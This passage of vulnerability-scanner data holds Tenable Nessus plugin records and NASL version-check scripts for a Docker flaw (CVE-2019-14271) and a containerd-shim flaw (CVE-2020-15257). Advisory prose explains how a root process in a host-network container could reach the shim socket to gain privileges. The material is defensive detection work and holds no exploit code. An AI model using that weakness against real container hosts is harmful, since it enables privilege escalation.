audit(AUDIT_PACKAGE_NOT_INSTALLED, \"containerd / docker / docker-runc / golang-github-docker-libnetwork\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:09:58", "description": "An update of the docker package has been released.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-07T00:00:00", "title": "Photon OS 2.0: Docker PHSA-2019-2.0-0193", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-14271"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:vmware:photonos:2.0", "p-cpe:/a:vmware:photonos:docker"], "id": "PHOTONOS_PHSA-2019-2_0-0193_DOCKER.NASL", "href": "https://www.tenable.com/plugins/nessus/132677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2019-2.0-0193. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132677);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2020/01/09\");\n\n script_cve_id(\"CVE-2019-14271\");\n\n script_name(english:\"Photon OS 2.0: Docker PHSA-2019-2.0-0193\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the docker package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-193.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", cpu:\"x86_64\", reference:\"docker-18.06.2-5.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", cpu:\"x86_64\", reference:\"docker-doc-18.06.2-5.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-10T09:09:01", "description": "According to the version of the kata-containers package installed,\nthe EulerOS installation on the remote host is affected by the\nfollowing vulnerability :\n\n - containerd is an industry-standard container runtime\n and is available as a daemon for Linux and Windows. In\n containerd before versions 1.3.9 and 1.4.3, the\n containerd-shim API is improperly exposed to host\n network containers. Access controls for the shim's API\n socket verified that the connecting process had an\n effective UID of 0, but did not otherwise restrict\n access to the abstract Unix domain socket. This would\n allow malicious containers running in the same network\n namespace as the shim, with an effective UID of 0 but\n otherwise reduced privileges, to cause new processes to\n be run with elevated privileges. This vulnerability has\n been fixed in containerd 1.3.9 and 1.4.3. Users should\n update to these versions as soon as they are released.\n It should be noted that containers started with an old\n version of containerd-shim should be stopped and\n restarted, as running containers will continue to be\n vulnerable even after an upgrade. If you are not\n providing the ability for untrusted users to start\n containers in the same network namespace as the shim\n (typically the 'host' network namespace, for example\n with docker run --net=host or hostNetwork: true in a\n Kubernetes pod) and run with an effective UID of 0, you\n are not vulnerable to this issue. If you are running\n containers with a vulnerable configuration, you can\n deny access to all abstract sockets with AppArmor by\n adding a line similar to deny unix addr=@**, to your\n policy. It is best practice to run containers with a\n reduced set of privileges, with a non-zero UID, and\n with isolated namespaces. The containerd maintainers\n strongly advise against sharing namespaces with the\n host. Reducing the set of isolation mechanisms used for\n a container necessarily increases that container's\n privilege, regardless of what container runtime is used\n for running that container.(CVE-2020-15257)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 5.2, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2021-02-05T00:00:00", "title": "EulerOS : kata-containers (EulerOS-SA-2021-1264)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-15257"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kata-containers", "cpe:/o:huawei:euleros:"], "id": "EULEROS_SA-2021-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/146231", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146231);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\n \"CVE-2020-15257\"\n );\n\n script_name(english:\"EulerOS : kata-containers (EulerOS-SA-2021-1264)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the kata-containers package installed,\nthe EulerOS installation on the remote host is affected by the\nfollowing vulnerability :\n\n - containerd is an industry-standard container runtime\n and is available as a daemon for Linux and Windows. In\n containerd before versions 1.3.9 and 1.4.3, the\n containerd-shim API is improperly exposed to host\n network containers. Access controls for the shim's API\n socket verified that the connecting process had an\n effective UID of 0, but did not otherwise restrict\n access to the abstract Unix domain socket. This would\n allow malicious containers running in the same network\n namespace as the shim, with an effective UID of 0 but\n otherwise reduced privileges, to cause new processes to\n be run with elevated privileges. This vulnerability has\n been fixed in containerd 1.3.9 and 1.4.3. Users should\n update to these versions as soon as they are released.\n It should be noted that containers started with an old\n version of containerd-shim should be stopped and\n restarted, as running containers will continue to be\n vulnerable even after an upgrade. If you are not\n providing the ability for untrusted users to start\n containers in the same network namespace as the shim\n (typically the 'host' network namespace, for example\n with docker run --net=host or hostNetwork: true in a\n Kubernetes pod) and run with an effective UID of 0, you\n are not vulnerable to this issue. If you are running\n containers with a vulnerable configuration, you can\n deny access to all abstract sockets with AppArmor by\n adding a line similar to deny unix addr=@**, to your\n policy. It is best practice to run containers with a\n reduced set of privileges, with a non-zero UID, and\n with isolated namespaces. The containerd maintainers\n strongly advise against sharing namespaces with the\n host. Reducing the set of isolation mechanisms used for\n a container necessarily increases that container's\n privilege, regardless of what container runtime is used\n for running that container.(CVE-2020-15257)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1264\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?38fcb0c2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kata-containers package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kata-containers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release (\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS \");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kata-containers-v1.11.1-6.h13.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kata-containers\");\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-29T01:09:27", "description": "An update of the containerd package has been released.", "edition": 3, "cvss3": {"score": 5.2, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2020-12-03T00:00:00", "title": "Photon OS 2.0: Containerd PHSA-2020-2.0-0301", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-15257"], "modified": "2020-12-03T00:00:00", "cpe": ["cpe:/o:vmware:photonos:2.0", "p-cpe:/a:vmware:photonos:containerd"], "id": "PHOTONOS_PHSA-2020-2_0-0301_CONTAINERD.NASL", "href": "https://www.tenable.com/plugins/nessus/143446", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-2.0-0301. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143446);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\"CVE-2020-15257\");\n\n script_name(english:\"Photon OS 2.0: Containerd PHSA-2020-2.0-0301\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the containerd package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-301.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15257\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'containerd-1.3.7-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'containerd-doc-1.3.7-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'containerd-extras-1.3.7-1.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'containerd');\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-12-15T10:34:54", "description": "Security fix for CVE-2020-15257\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 2, "cvss3": {"score": 5.2, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2020-12-10T00:00:00", "title": "Fedora 33 : containerd (2020-baeb8dbaea)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-15257"], "modified": "2020-12-10T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "p-cpe:/a:fedoraproject:fedora:containerd"], "id": "FEDORA_2020-BAEB8DBAEA.NASL", "href": "https://www.tenable.com/plugins/nessus/144042", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-baeb8dbaea.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144042);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/14\");\n\n script_cve_id(\"CVE-2020-15257\");\n script_xref(name:\"FEDORA\", value:\"2020-baeb8dbaea\");\n\n script_name(english:\"Fedora 33 : containerd (2020-baeb8dbaea)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fix for CVE-2020-15257\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-baeb8dbaea\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected containerd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"containerd-1.4.3-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"containerd\");\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-29T07:10:19", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 host has packages installed that are affected by a\nvulnerability as referenced in the USN-4653-1 advisory. Note that Nessus has not tested for this issue but has instead\nrelied only on the application's self-reported version number.", "edition": 3, "cvss3": {"score": 5.2, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2020-12-01T00:00:00", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 : containerd vulnerability (USN-4653-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-15257"], "modified": "2020-12-01T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:containerd", "p-cpe:/a:canonical:ubuntu_linux:golang-github-containerd-containerd-dev", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.10"], "id": "UBUNTU_USN-4653-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143373", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4653-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143373);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\"CVE-2020-15257\");\n script_xref(name:\"USN\", value:\"4653-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 : containerd vulnerability (USN-4653-1)\");\n script_summary(english:\"Checks the dpkg output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS / 20.10 host has packages installed that are affected by a\nvulnerability as referenced in the USN-4653-1 advisory. Note that Nessus has not tested for this issue but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4653-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected containerd and / or golang-github-containerd-containerd-dev packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15257\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:golang-github-containerd-containerd-dev\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2021 Canonical, Inc. / NASL script (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|20\\.04|20\\.10)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04 / 20.04 / 20.10', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'containerd', 'pkgver': '1.2.6-0ubuntu1~16.04.5'},\n {'osver': '18.04', 'pkgname': 'containerd', 'pkgver': '1.3.3-0ubuntu1~18.04.3'},\n {'osver': '20.04', 'pkgname': 'containerd', 'pkgver': '1.3.3-0ubuntu2.1'},\n {'osver': '20.10', 'pkgname': 'containerd', 'pkgver': '1.3.7-0ubuntu3.1'},\n {'osver': '20.10', 'pkgname': 'golang-github-containerd-containerd-dev', 'pkgver': '1.3.7-0ubuntu3.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'containerd / golang-github-containerd-containerd-dev');\n}", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-10T09:08:59", "description": "According to the version of the kata-containers package installed,\nthe EulerOS installation on the remote host is affected by the\nfollowing vulnerability :\n\n - containerd is an industry-standard container runtime\n and is available as a daemon for Linux and Windows. In\n containerd before versions 1.3.9 and 1.4.3, the\n containerd-shim API is improperly exposed to host\n network containers. Access controls for the shim's API\n socket verified that the connecting process had an\n effective UID of 